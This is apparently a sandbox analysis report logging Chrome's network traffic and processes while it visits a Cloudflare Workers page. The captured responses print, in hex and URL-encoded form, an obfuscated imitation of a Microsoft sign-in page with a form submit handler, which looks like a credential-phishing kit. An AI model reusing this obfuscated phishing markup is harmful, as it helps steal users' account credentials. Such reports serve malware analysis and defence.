                                  2024-04-17 23:13:27 UTC1369INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30 6f 70 74 69 6f 6e 25 32
                                  Data Ascii: 520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520option%2
                                  2024-04-17 23:13:27 UTC1369INData Raw: 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                  Data Ascii: 527%2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2520%2520
                                  2024-04-17 23:13:27 UTC1369INData Raw: 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 35 32 30 25
                                  Data Ascii: 250A%2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opacity%2520%
                                  2024-04-17 23:13:27 UTC1369INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 2520%2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%2520%2520%


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.449764172.67.204.1854433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:28 UTC356OUTGET /favicon.ico HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:28 UTC546INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:28 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65xx1gw3v8nr0gWX0dyc6GLWcY35FvBuZAlFvLXaSPZgG0N0lMhexsH0Vq7UvZKKd8t56zgHadBPPIawAeiohHN3HYYv72VHYvAST%2BrAWrrR1IE5vmCnACehrW0v9JuY1T95rjusKiw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601b174f6e7bc6-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:28 UTC823INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:28 UTC1369INData Raw: 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35 32 30 69 6e 70 75 74 25 32 35 37 42 25 32 35 30
                                  Data Ascii: 250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%2520input%257B%250
                                  2024-04-17 23:13:28 UTC1369INData Raw: 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32
                                  Data Ascii: 0%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%2520display%253A%2
                                  2024-04-17 23:13:28 UTC1369INData Raw: 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35
                                  Data Ascii: isplay%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%2520none%253B%25
                                  2024-04-17 23:13:28 UTC1369INData Raw: 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                  Data Ascii: ormal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%2520%2520%2520%252
                                  2024-04-17 23:13:28 UTC1369INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25
                                  Data Ascii: 520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%
                                  2024-04-17 23:13:28 UTC1369INData Raw: 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30 6f 70 74 69 6f 6e 25 32 35 33 43 2f 70 25 32 35
                                  Data Ascii: %2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520option%253C/p%25
                                  2024-04-17 23:13:28 UTC1369INData Raw: 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                  Data Ascii: %250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2520%2520%2520%25
                                  2024-04-17 23:13:28 UTC1369INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32
                                  Data Ascii: 0%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opacity%2520%253D%252
                                  2024-04-17 23:13:28 UTC1369INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                  Data Ascii: 0%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%2520%2520%2520%252


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.44976735.190.80.14433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:14:12 UTC546OUTOPTIONS /report/v4?s=a0y9wf02%2B0sMuQfKjzUbPKI%2BE4ejHAzTfitHdf%2BZQDimsDIjJSC5cI1k%2F1id0BHYMYhjCyTk5fLErWgLQATFNZ1BWKz3SvDJ6Ze93MlwdjCXGcRS0TXfM5y9HbDaK%2BKtFkQvI9Uk HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Origin: https://www.linkpicture.com
                                  Access-Control-Request-Method: POST
                                  Access-Control-Request-Headers: content-type
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:14:12 UTC336INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  access-control-max-age: 86400
                                  access-control-allow-methods: POST, OPTIONS
                                  access-control-allow-origin: *
                                  access-control-allow-headers: content-type, content-length
                                  date: Wed, 17 Apr 2024 23:14:12 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.44976835.190.80.14433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:14:12 UTC484OUTPOST /report/v4?s=a0y9wf02%2B0sMuQfKjzUbPKI%2BE4ejHAzTfitHdf%2BZQDimsDIjJSC5cI1k%2F1id0BHYMYhjCyTk5fLErWgLQATFNZ1BWKz3SvDJ6Ze93MlwdjCXGcRS0TXfM5y9HbDaK%2BKtFkQvI9Uk HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Content-Length: 467
                                  Content-Type: application/reports+json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:14:12 UTC467OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 34 38 31 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 38 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 73 6a 77 2e 6e 65 77 66 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 35 2e 31 38 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                  Data Ascii: [{"age":44819,"body":{"elapsed_time":485,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://nsjw.newf.workers.dev/","sampling_fraction":1.0,"server_ip":"104.21.235.182","status_code":404,"type":"http.error"},"type":"network-err
                                  2024-04-17 23:14:13 UTC168INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  date: Wed, 17 Apr 2024 23:14:12 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:01:13:03
                                  Start date:18/04/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:01:13:08
                                  Start date:18/04/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2224,i,7554063841504006908,15893093035192475524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:01:13:09
                                  Start date:18/04/2024
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://nsjw.newf.workers.dev/"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  No disassembly